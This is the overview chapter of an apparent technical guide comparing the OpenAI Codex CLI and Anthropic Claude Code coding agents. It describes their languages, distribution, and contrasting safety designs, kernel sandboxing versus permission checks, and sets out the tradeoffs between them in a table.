Chapter 1: Overview
What Is a Coding Agent?
A coding agent is an AI system that can autonomously write, modify, and debug code by combining a large language model (LLM) with a set of tools — shell access, file editing, search, and more. Unlike a chatbot that only suggests code, a coding agent acts: it reads your codebase, runs commands, edits files, and iterates until the task is done.
The core loop is deceptively simple:
User prompt → LLM reasoning → Tool calls → Results fed back → LLM continues → ... → Done
The engineering challenge is everything around that loop: security, permissions, context management, prompt construction, error recovery, and user experience.
The Two Agents
This project compares two production coding agents that represent different engineering philosophies:
Codex CLI (OpenAI)
- Repository: openai/codex
- Language: Rust (81 crates in a monorepo)
- UI: Ratatui (native terminal TUI)
- Distribution: Pre-compiled platform-specific binaries, distributed via NPM wrapper
- Models: GPT-4o, o3, GPT-5.x (OpenAI Responses API)
Claude Code (Anthropic)
- Source: Closed-source; analysis based on decompiled source (v2.1.88) — see VERSIONS.md
- Language: TypeScript
- UI: Custom Ink-like renderer (React + react-reconciler); also available as a Desktop app (macOS, Windows)
- Distribution: Native binary installer (recommended, auto-updates), Homebrew, WinGet, Desktop app, npm (deprecated)
- Models: Claude Sonnet, Opus, Haiku (Anthropic Messages API)
Design Philosophies
The two agents make fundamentally different bets about how to build a safe, effective coding agent:
Codex: "Sandbox everything, let the model run free inside"
Codex uses kernel-level sandboxing (Apple Seatbelt on macOS, Landlock + seccomp on Linux) to contain the model's actions. The model gets a powerful shell and can run whatever it wants — but the operating system enforces boundaries. This is a containment-first approach: assume the model will do unexpected things and make them physically impossible.
The tool set is minimal — mostly shell and apply_patch — because the model can do anything through the shell. Fewer tools means a simpler system and less surface area.
Claude Code: "Analyze everything, ask before doing anything risky"
Claude Code uses application-level permission checks with an LLM-based classifier (a side query to Claude itself) to assess risk before execution. There's no kernel sandbox — instead, every tool call goes through a permission system that can auto-approve safe operations, prompt the user for risky ones, or deny dangerous ones outright.
The tool set is large (40+) with purpose-built tools for search, file editing, web access, and more. Each tool has its own permission logic, input validation, and output formatting. This is a control-at-every-layer approach.
The Tradeoff
| Dimension | Codex (Containment) | Claude Code (Control) |
|---|---|---|
| What if the model does something unexpected? | Kernel blocks it | Permission system may not anticipate it |
| Tool flexibility | Model can pipe, chain, combine freely | Fixed tool interfaces |
| Portability | Requires OS-specific sandbox support | Runs anywhere Node/Bun runs |
| Token efficiency | Raw shell output, model formats it | Tool wrappers optimize output for tokens |
| Setup complexity | Needs platform-specific binaries | Pure JavaScript, simpler deployment |
Neither approach is strictly better — they optimize for different threat models and use cases.
What's Ahead
The following chapters break down each component of the agent architecture, showing how both agents implement it and what tradeoffs they make. Each chapter is self-contained — read them in order or jump to what interests you.